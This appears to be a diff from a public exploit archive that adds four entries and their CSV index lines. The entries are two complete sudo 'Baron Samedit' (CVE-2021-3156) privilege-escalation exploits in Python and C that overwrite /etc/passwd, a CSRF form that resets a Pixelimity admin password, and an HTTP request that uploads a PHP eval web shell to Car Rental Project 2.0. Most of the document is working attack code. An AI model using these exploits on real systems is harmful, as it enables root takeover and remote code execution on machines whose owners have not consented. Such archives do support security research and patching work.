DB: 2021-02-04

4 changes to exploits/shellcodes

Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)
Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)
Pixelimity 1.0 - 'password' Cross-Site Request Forgery
Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution

exploits/multiple/local/49521.py

@@ -0,0 +1,139 @@
+# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)
+# Date: 2021-02-02
+# Exploit Author: West Shepherd
+# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.
+# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31
+# CVE : CVE-2021-3156
+# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.
+# Sources:
+# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
+# (2) https://github.com/stong/CVE-2021-3156
+# Requirements: Python3
+
+#!/usr/bin/python3
+import os
+import pwd
+import time
+import sys
+import argparse
+
+
+class Exploit(object):
+    username = ''
+    size = 0
+    data = ''
+
+    def __init__(self, source, target, sleep):
+        self.sleep = sleep
+        self.source = source
+        self.target = target
+
+    @staticmethod
+    def readFile(path):
+        return open(path, 'r').read()
+
+    @staticmethod
+    def getUser():
+        return pwd.getpwuid(os.getuid())[0]
+
+    @staticmethod
+    def getSize(path):
+        return os.stat(path).st_size
+
+    def main(self):
+        self.username = self.getUser()
+        self.data = self.readFile(self.source)
+        self.size = self.getSize(self.target)
+        environ = {
+            '\n\n\n\n\n': '\n' + self.data,
+            'SUDO_ASKPASS': '/bin/false',
+            'LANG':
+'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
+            'A': 'A' * 0xffff
+        }
+        for i in range(5000):
+            directory =
+'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i
+            overflow =
+'11111111111111111111111111111111111111111111111111111111%s' %
+directory
+
+            if os.path.exists(directory):
+                sys.stdout.write('file exists %s\n' % directory)
+                continue
+
+            child = os.fork()
+            os.environ = environ
+            if child:
+                sys.stdout.write('[+] parent %d \n' % i)
+                sys.stdout.flush()
+                time.sleep(self.sleep)
+                if not os.path.exists(directory):
+                    try:
+                        os.mkdir(directory, 0o700)
+                        os.symlink(self.target, '%s/%s' % (directory,
+self.username))
+                        os.waitpid(child, 0)
+                    except:
+                        continue
+            else:
+                sys.stdout.write('[+] child %d \n' % i)
+                sys.stdout.flush()
+                os.setpriority(os.PRIO_PROCESS, 0, 20)
+                os.execve(
+                    path='/usr/bin/sudoedit',
+                    argv=[
+                        '/usr/bin/sudoedit',
+                        '-A',
+                        '-s',
+                        '\\',
+                        overflow
+                    ],
+                    env=environ
+                )
+                sys.stdout.write('[!] execve failed\n')
+                sys.stdout.flush()
+                os.abort()
+                break
+
+            if self.size != self.getSize(self.target):
+                sys.stdout.write('[*] success at iteration %d \n' % i)
+                sys.stdout.flush()
+                break
+        sys.stdout.write("""
+            \nConsider the following if the exploit fails:
+            \n\t(1) If all directories are owned by root then sleep
+needs to be decreased.
+            \n\t(2) If they're all owned by you, then sleep needs
+increased.
+        """)
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(
+        add_help=True,
+        description='* Sudo Privilege Escalation / Heap Overflow -
+CVE-2021-3156 *'
+    )
+    try:
+        parser.add_argument('-source', action='store', help='Path to
+malicious "passwd" file to overwrite the target')
+        parser.add_argument('-target', action='store', help='Target
+file path to be overwritten (default: /etc/passwd)')
+        parser.add_argument('-sleep', action='store', help='Sleep
+setting for forked processes (default: 0.01 seconds')
+        parser.set_defaults(target='/etc/passwd', sleep='0.01')
+
+        options = parser.parse_args()
+        if options.source is None:
+            parser.print_help()
+            sys.exit(1)
+
+        exp = Exploit(
+            source=options.source,
+            target=options.target,
+            sleep=float(options.sleep)
+        )
+        exp.main()
+    except Exception as err:
+        sys.stderr.write(str(err))

exploits/multiple/local/49522.c

@@ -0,0 +1,151 @@
+# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)
+# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty
+# Date: 30.01.2021
+# Vendor: https://www.sudo.ws/
+# Link: https://www.sudo.ws/download.html
+# CVE: CVE-2021-3156
+
+[+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021
+
+[Exploit Program Code]
+
+// Exploit by @gf_256 aka cts
+// With help from r4j
+// Debug by @nu11secur1ty
+// Original advisory by Baron Samedit of Qualys
+
+// Tested on Ubuntu 18.04 and 20.04 & 20.04.01
+// You will probably need to adjust RACE_SLEEP_TIME.
+
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdlib.h>
+#include <assert.h>
+#include <unistd.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/resource.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <pwd.h>
+
+// !!! best value of this varies from system-to-system !!!
+// !!! you will probably need to tune this !!!
+#define RACE_SLEEP_TIME 10000
+
+char *target_file;
+char *src_file;
+
+size_t query_target_size()
+{
+    struct stat st;
+    stat(target_file, &st);
+    return st.st_size;
+}
+
+char* read_src_contents()
+{
+    FILE* f = fopen(src_file, "rb");
+    if (!f) {
+        puts("oh no baby what are you doing :(");
+        abort();
+    }
+    fseek(f, 0, SEEK_END);
+    long fsize = ftell(f);
+    fseek(f, 0, SEEK_SET);
+    char *content = malloc(fsize + 1);
+    fread(content, 1, fsize, f);
+    fclose(f);
+    return content;
+}
+
+char* get_my_username()
+{
+    // getlogin can return incorrect result (for example, root under su)!
+    struct passwd *pws = getpwuid(getuid());
+    return strdup(pws->pw_name);
+}
+
+int main(int my_argc, char **my_argv)
+{
+    puts("CVE-2021-3156 PoC by @gf_256");
+    puts("original advisory by Baron Samedit");
+
+    if (my_argc != 3) {
+        puts("./meme <target file> <src file>");
+        puts("Example: ./meme /etc/passwd my_fake_passwd_file");
+        return 1;
+    }
+    target_file = my_argv[1];
+    src_file = my_argv[2];
+    printf("we will overwrite %s with stuff from %s\n", target_file, src_file);
+
+    char* myusername = get_my_username();
+    printf("hi, my name is %s\n", myusername);
+
+    size_t initial_size = query_target_size();
+    printf("%s is %zi big right now\n", target_file, initial_size);
+
+    char* stuff_to_write = read_src_contents();
+
+    char memedir[1000];
+    char my_symlink[1000];
+    char overflow[1000];
+
+    char* bigstuff = calloc(1,0x10000);
+    memset(bigstuff, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address
+
+    char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\", overflow, NULL
+    };
+
+    char *envp[] = {
+        "\n\n\n\n\n", // put some newlines here to separate our real contents from the junk stuff_to_write,
+        "SUDO_ASKPASS=/bin/false", "LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+", bigstuff, NULL
+    };
+
+    puts("ok podracing time bitches");
+
+    // Boom =)
+    // for (int i = 0; i < 5000; i++)
+    for (int i = 0; i < 3000; i++) {
+        sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i);
+        sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir);
+        sprintf(my_symlink, "%s/%s", memedir, myusername);
+        puts(memedir);
+
+        if (access(memedir, F_OK) == 0) {
+            printf("dude, %s already exists, do it from a clean working dir\n", memedir);
+            return 1;
+        }
+
+        pid_t childpid = fork();
+        if (childpid) { // parent
+            usleep(RACE_SLEEP_TIME);
+            mkdir(memedir, 0700);
+            symlink(target_file, my_symlink);
+            waitpid(childpid, 0, 0);
+        } else { // child
+            setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability
+            execve("/usr/bin/sudoedit", argv, envp); // noreturn
+            puts("execve fails?!");
+            abort();
+        }
+
+        if (query_target_size() != initial_size) {
+            puts("target file has a BRUH MOMENT!!!! SUCCess???");
+            system("xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'");
+// ayy lmao
+            return 0;
+        }
+    }
+
+    puts("Failed?");
+    puts("if all the meme dirs are owned by root, the usleep needs to be decreased.");
+    puts("if they're all owned by you, the usleep needs to be increased");
+
+    return 0;
+}

exploits/multiple/webapps/49519.html

@@ -0,0 +1,37 @@
+# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
+# Date: 2020-06-03
+# Exploit Author: Noth
+# Vendor Homepage: https://github.com/pixelimity/pixelimity
+# Software Link: https://github.com/pixelimity/pixelimity
+# Version: v1.0
+# CVE : 2020-23522
+
+Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.
+
+PoC :
+
+<html>
+<body>
+<script>history.pushState(",",'/')</script>
+<form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php
+” method=“POST”>
+<input type=“hidden” name=“submit&#95;setting” value=“Save&#32;Setting”/>
+<input type=“hidden” name=“data&#91;admin&#95;portfolio&#95;show&#93;”
+value=“5”/>
+<input type=“hidden” name=“data&#91;admin&#95;pages&#95;show&#93;”
+value=“5”/>
+<input type=“hidden” name=“admin&#91;data&#95;password&#93;”
+value=“456789”/>
+<input type=“hidden” name=“data&#91;site#95;name&#93;"
+value=“Pixelimity”/>
+<input type=“hidden” name=“data&#91;site&#95;name&#93;show&#93;”
+value=“My&#32;Online&#32;Portfolio”/>
+<input type=“hidden” name=“data&#91;home&#95;image&#95;size&#93” value=“5”/>
+<input type=“hidden” name=“ data&#91;single&#95;image&#95;image&#95;size#93
+” value=“ 240&44;0&#44;0&44;auto ”/>
+<input type=“hidden” name=“data&#91;single&#95;image&#95;image&#95;size#93”
+value=“720&44;0&#44;0&44;auto”/>
+<input type=“submit” value=“Submit request”/>
+</form>
+</body>
+</html>

exploits/php/webapps/49520.py

@@ -0,0 +1,40 @@
+# Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution
+# Date: 3/2/2021
+# Exploit Author: Jannick Tiger
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
+# Version:  V 2.0
+# Tested on Windows 10, XAMPP
+
+POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
+Gecko/20100101 Firefox/85.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------346751171915680139113101061568
+Content-Length: 369
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/carrental/admin/changeimage1.php?imgid=4
+Cookie: PHPSESSID=te82lj6tvep7afns0qm890393e
+Upgrade-Insecure-Requests: 1
+
+-----------------------------346751171915680139113101061568
+Content-Disposition: form-data; name="img1"; filename="1.php"
+Content-Type: application/octet-stream
+
+<?php @eval($_POST[pp]);?>
+-----------------------------346751171915680139113101061568
+Content-Disposition: form-data; name="update"
+
+
+-----------------------------346751171915680139113101061568--
+
+
+# Uploaded Malicious File can  be Found in :
+carrental\admin\img\vehicleimages\1.php
+# go to http://localhost/carrental/admin/img/vehicleimages/1.php, Execute malicious code via post value phpinfo();

files_exploits.csv

@@ -11252,6 +11252,8 @@ id,file,description,date,author,type,platform,port
 49516,exploits/solaris/local/49516.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2021-02-02,"Marco Ivaldi",local,solaris,
 49517,exploits/solaris/local/49517.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2021-02-02,"Marco Ivaldi",local,solaris,
 49518,exploits/solaris/local/49518.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)",2021-02-02,"Marco Ivaldi",local,solaris,
+49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",2021-02-03,"West Shepherd",local,multiple,
+49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",2021-02-03,nu11secur1ty,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43710,3 +43712,5 @@ id,file,description,date,author,type,platform,port
 49511,exploits/php/webapps/49511.py,"Klog Server 2.4.1 - Command Injection (Authenticated)",2021-02-01,"Metin Yunus Kandemir",webapps,php,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,
 49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php,
+49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,
+49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,